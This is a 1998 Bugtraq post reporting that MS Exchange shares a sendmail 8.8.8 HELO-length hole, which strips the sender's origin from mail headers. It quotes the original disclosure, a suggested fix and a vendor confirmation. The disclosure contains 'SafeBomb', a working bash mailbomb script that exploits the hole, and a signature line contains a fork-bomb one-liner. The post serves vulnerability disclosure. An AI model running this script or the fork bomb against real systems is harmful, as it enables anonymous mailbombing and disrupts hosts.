[6850] in bugtraq
MS Exchange vulnerable. (was: about sendmail 8.8.8 HELO hole)
daemon@ATHENA.MIT.EDU (Yuri Krichevsky)
Thu May 28 16:57:08 1998
Date: Wed, 27 May 1998 21:06:17 +0300
Reply-To: Yuri Krichevsky <yury@BISTBN.COM>
From: Yuri Krichevsky <yury@BISTBN.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.96.980522121734.11307A-100000@pns.netbg.com>
Seems like MS Exchange Internet Mail Service 5.5 is vulnerable =
too.
--
"BSD code sucks. Of course, everything else sucks far more."
- Theo de Raadt (OpenBSD President)
> -----Original Message-----
> From: Micha? Zalewski <lcamtuf@boss.staszic.waw.pl>
> To: info@rootshell.com <info@rootshell.com>
> Date: 10 stycznia 1998 12:28
> Subject: Sendmail 8.8.8 (qmail?) HELO hole.
>
>
> Here's a brief description of Sendmail (qmail) hole I found
> recently:
>
> When someone mailbombs you, or tries to send fakemail, spam, etc -
> sendmail normally attachs sender's host name and it's address
> to outgoing message:
>
> --
> >From spam@flooders.net Mon Jan 5 22:08:21 1998
> Received: from spammer (marc@math.university.edu [150.129.84.5])
> by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376
> for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
> Date: Mon, 5 Jan 1998 22:07:54 +0100
> From: spam@flooders.net
> Message-Id: <3.14159665@pi>
>
> MAILBOOM!!!
> --
>
> That's perfect - now you know, who is responsible for that annoying
> junk in your mailbox: "Received: from spammer (marc@math.university.e=
du
> [150.129.84.5])". Nothing easier...
> But I found a small hole, which allows user to hide it's personality,
> and send mails anonymously. The only thing you should do is to
> pass HELO string longer than approx. 1024 B - sender's location and
> other very useful information will be cropped!!! Message
> headers should become not interesting. Sometimes, sender
> may become quite untraceable (but not always, if it's possible
> to obtain logs from machine which has been used to sent):
>
> --
> >From spam@flooders.net Mon Jan 5 22:09:05 1998
> Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx
> Date: Mon, 5 Jan 1998 22:08:52 +0100
> From: spam@flooders.net
> Message-Id: <3.14159665@pi>
>
> MAILBOOM!!! Now guess who am I...
> --
>
>
> Here's a simple example of Sendmail's HELO hole usage. Note, this
> script has been written ONLY to show how easy may be sending
> fakemails, mailbombs, with cooperation of Sendmail ;) Script is
> very slow and restricted in many ways, but explains the problem
> well (note, some of non-Berkeley daemons are also affected,
> probably Qmail?):
>
> -- EXPLOIT CODE --
> #!/bin/bash
> TMPDIR=3D/tmp/`whoami`
> PLIK=3D$TMPDIR/.safe
> TIMEOUT=3D2
> LIMIT=3D10
> MAX=3D20
>
> echo
> echo "SafeBomb 1.02b -- sendmail HELO hole usage example"
> echo "Author: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>"
> echo
>
> if [ "$4" =3D "" ]; then
> echo "USAGE: $0 msgfile address server sender"
> echo
> echo " msgfile - file to send as a message body"
> echo " address - address of lucky recipient"
> echo " server - outgoing smtp server w/sendmail"
> echo " sender - introduce yourself"
> echo
> echo "WARNING: For educational use ONLY. Mailbombing is illegal."
> echo "Think twice BEFORE you use this program in any way. Also,"
> echo "I've never said this program is 100% safe nor bug-free."
> echo
> sleep 1
> exit 0
> fi
>
> if [ ! -f $1 ]; then
> echo "Message file not found."
> echo
> exit 0
> fi
>
> echo -n "Preparing message..."
> mkdir $TMPDIR &>/dev/null
> chmod 700 $TMPDIR
> echo "echo \"helo
> _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
> omb__safebomb__safebomb__safebomb__safebomb__sa
> febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
> __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
> ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_
> _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
> bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__
> safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
> omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s
> afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo
> mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
> febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom
> b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
> ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
> b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
> ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
> __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
> bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_
> _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
> omb_\"" >$PLIK
> echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK
> echo "echo \"rcpt to: $2\"" >>$PLIK
> echo "echo \"data\"" >>$PLIK
> echo "cat <<__qniec__" >>$PLIK
> cat $1 >>$PLIK
> echo "__qniec__" >>$PLIK
> echo "echo \".\"" >>$PLIK
> echo "echo \"quit\"" >>$PLIK
> echo "sleep $TIMEOUT" >>$PLIK
> chmod +x $PLIK
> echo "OK"
>
> echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."
> SENT=3D0
>
> while [ -f $1 ]; do
> $PLIK|telnet $3 25 &>/dev/null &
> let SENT=3DSENT+1
> echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
> CONNECTED=3D`ps|grep -c "telnet $3"`
> if [ "$LIMIT" -le "$CONNECTED" ]; then
> while [ "$LIMIT" -le "$CONNECTED" ]; do
> sleep 1
> done
> fi
> if [ "$SENT" -ge "$MAX" ]; then
> echo "It's just an example, sorry."
> echo
> exit 0
> fi
> done
> -- EOF --
>
> Suggested fix: insert additional length limit into HELO/EHLO
> parameter scanning routine OR disable AllowBogusHELO (but it
> may cause serious troubles). I have no 8.8.8 sources at the
> time, so execuse me if it's unclear.
>
> PS:
>
> --
> From: Gregory Neil Shapiro <sendmail+gshapiro@sendmail.org>
>
> I was able to reproduce the header problem by lengthening the HELO st=
ring
> in your script.
>
> [...]
>
> This will be fixed in sendmail 8.9.
> --
>
> _____________________________________________________________________=
__
> Micha? Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.p=
l]
> Iterowa=D6 jest rzecz+ ludzk+, wykonywa=D6 rekursywnie - bosk+ [P. De=
ustch]
> =3D--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ------=
---=3D
>
